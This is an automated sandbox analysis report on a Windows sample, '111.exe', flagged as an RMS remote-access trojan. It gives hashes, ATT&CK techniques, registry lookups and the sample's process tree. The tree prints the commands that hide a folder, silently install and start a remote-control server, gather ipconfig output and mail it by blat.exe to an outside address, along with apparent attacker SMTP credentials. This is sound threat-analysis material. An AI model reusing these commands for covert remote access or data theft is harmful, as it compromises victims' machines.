rms | 75d36fc4f14630cd347bce7e8fcf951b42bf47a7fc1e33af4a5ec7b2ec867a71

Analysis

max time kernel
147s
max time network
140s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
02-11-2024 13:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

111.exe
Size

21KB
MD5

82427df03213df677115af3d9bc8d134
SHA1

f2870bd0ebba0d5bf4b8b06099047cdbfb5254b3
SHA256

8433cab0e54e801a2be34fb149acf6bf8b87a60828eefe47af05edff762fe586
SHA512

3141435c43fe6dc7f76786455d8daa8af2e99a56936cab76cbfbd867ef77fdb2999a32f7d73213a513bb1ee5a5a2192d52f5163750647c5386d2ddabdaad1fa3
SSDEEP

384:UIiV728hUQ7Y2P/cVEccDdye7kjlWLe7grPiA8jyrMPhTjanbBoZKqaNJawcudoq:URGuY2P0Vo6r7SiAwyrMRjbMnbcuyD7h

Score

10^/10

rms discovery rat trojan upx

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Rms family
rms

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	111.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3316-0-0x0000000000400000-0x0000000000410000-memory.dmp	upx
behavioral2/memory/3316-13-0x0000000000400000-0x0000000000410000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	blat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	blat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RManServer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RManFUSClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RManServer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RManServer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RManServer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RManFUSClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	111.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1108	ipconfig.exe

Runs .reg file with regedit 1 IoCs

pid	Process
1708	regedit.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1120	RManServer.exe
1120	RManServer.exe
1120	RManServer.exe
1120	RManServer.exe
1328	RManFUSClient.exe
1328	RManFUSClient.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1788	RManServer.exe
Token: SeDebugPrivilege	3964	RManServer.exe
Token: SeTakeOwnershipPrivilege	1120	RManServer.exe
Token: SeTcbPrivilege	1120	RManServer.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 3316 wrote to memory of 4696	3316	111.exe	84
PID 3316 wrote to memory of 4696	3316	111.exe	84
PID 3316 wrote to memory of 4696	3316	111.exe	84
PID 4696 wrote to memory of 2396	4696	cmd.exe	87
PID 4696 wrote to memory of 2396	4696	cmd.exe	87
PID 4696 wrote to memory of 2396	4696	cmd.exe	87
PID 4696 wrote to memory of 1708	4696	cmd.exe	88
PID 4696 wrote to memory of 1708	4696	cmd.exe	88
PID 4696 wrote to memory of 1708	4696	cmd.exe	88
PID 4696 wrote to memory of 4352	4696	cmd.exe	90
PID 4696 wrote to memory of 4352	4696	cmd.exe	90
PID 4696 wrote to memory of 4352	4696	cmd.exe	90
PID 4696 wrote to memory of 1788	4696	cmd.exe	91
PID 4696 wrote to memory of 1788	4696	cmd.exe	91
PID 4696 wrote to memory of 1788	4696	cmd.exe	91
PID 4696 wrote to memory of 3964	4696	cmd.exe	92
PID 4696 wrote to memory of 3964	4696	cmd.exe	92
PID 4696 wrote to memory of 3964	4696	cmd.exe	92
PID 1120 wrote to memory of 1328	1120	RManServer.exe	94
PID 1120 wrote to memory of 1328	1120	RManServer.exe	94
PID 1120 wrote to memory of 1328	1120	RManServer.exe	94
PID 1120 wrote to memory of 3012	1120	RManServer.exe	95
PID 1120 wrote to memory of 3012	1120	RManServer.exe	95
PID 1120 wrote to memory of 3012	1120	RManServer.exe	95
PID 4696 wrote to memory of 2660	4696	cmd.exe	96
PID 4696 wrote to memory of 2660	4696	cmd.exe	96
PID 4696 wrote to memory of 2660	4696	cmd.exe	96
PID 4696 wrote to memory of 1108	4696	cmd.exe	97
PID 4696 wrote to memory of 1108	4696	cmd.exe	97
PID 4696 wrote to memory of 1108	4696	cmd.exe	97
PID 4696 wrote to memory of 1980	4696	cmd.exe	99
PID 4696 wrote to memory of 1980	4696	cmd.exe	99
PID 4696 wrote to memory of 1980	4696	cmd.exe	99

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2396	attrib.exe

C:\Users\Admin\AppData\Local\Temp\111.exe
"C:\Users\Admin\AppData\Local\Temp\111.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3316
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BECC.tmp\111.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4696
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "Word"
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2396
- - C:\Windows\SysWOW64\regedit.exe
    regedit /s "111.reg"
    3⤵
    - System Location Discovery: System Language Discovery
    - Runs .reg file with regedit
    PID:1708
- - C:\Users\Admin\AppData\Local\Temp\Word\RManServer.exe
    "Word\RManServer.exe" /server /firewall
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4352
- - C:\Users\Admin\AppData\Local\Temp\Word\RManServer.exe
    "Word\RManServer.exe" /server /silentinstall
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1788
- - C:\Users\Admin\AppData\Local\Temp\Word\RManServer.exe
    "Word\RManServer.exe" /server /start
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3964
- - C:\Users\Admin\AppData\Local\Temp\blat.exe
    blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u LIMON12000 -pw nat12345
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2660
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /all
    3⤵
    - System Location Discovery: System Language Discovery
    - Gathers network information
    PID:1108
- - C:\Users\Admin\AppData\Local\Temp\blat.exe
    blat.exe ip.txt -to [email protected].
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1980

C:\Users\Admin\AppData\Local\Temp\Word\RManServer.exe
C:\Users\Admin\AppData\Local\Temp\Word\RManServer.exe
1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1120
- C:\Users\Admin\AppData\Local\Temp\Word\RManFUSClient.exe
  "C:\Users\Admin\AppData\Local\Temp\Word\RManFUSClient.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:1328
- C:\Users\Admin\AppData\Local\Temp\Word\RManFUSClient.exe
  C:\Users\Admin\AppData\Local\Temp\Word\RManFUSClient.exe /tray
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3012

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\BECC.tmp\111.bat

Filesize
396B

MD5
b348cd1535602f34657360ef9a3e42a1

SHA1
43c5823f1d14d28c6c3ca2e20648256715ba97ca

SHA256
318dbd13350c6250369cb98d7c768ef8959df150852728aedee011c95d191dc5

SHA512
7b50f003f8492709b1ee67ec5b76f8a8d1b82977499197ec35b75606da397e4f2d38578c1cbd1314706716088c0f4d1a22cf7bd7fc93476c637b60f6ac3ee9e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ip.txt

Filesize
1022B

MD5
ec8784f2d9ffaff069ae0bbc77de9fe7

SHA1
f222b3c118d1c9b72fa0c3d772008634aaf9c907

SHA256
48f6ba9b89fb5ccd2c3ce40c79dc8366146a4c6ffba1f96b924539ab2e1fa36e

SHA512
6752b08d0a635573646c2bf79e7968e8292634c6a0a331f2742dea624b9568eb69ed3785e502d6ac20a6b6221ba1fe8b36129efbe3c24e275b4c08e79687f447

Download Submit
memory/1120-14-0x0000000000400000-0x0000000000786000-memory.dmp

Filesize
3.5MB

Download
memory/1328-15-0x0000000000400000-0x0000000000717000-memory.dmp

Filesize
3.1MB

Download
memory/1788-7-0x0000000000400000-0x0000000000786000-memory.dmp

Filesize
3.5MB

Download
memory/3012-16-0x0000000000400000-0x0000000000717000-memory.dmp

Filesize
3.1MB

Download
memory/3316-0-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/3316-13-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/3964-8-0x0000000000400000-0x0000000000786000-memory.dmp

Filesize
3.5MB

Download
memory/4352-5-0x00000000026C0000-0x00000000026C1000-memory.dmp

Filesize
4KB

Download
memory/4352-6-0x0000000000400000-0x0000000000786000-memory.dmp

Filesize
3.5MB

Download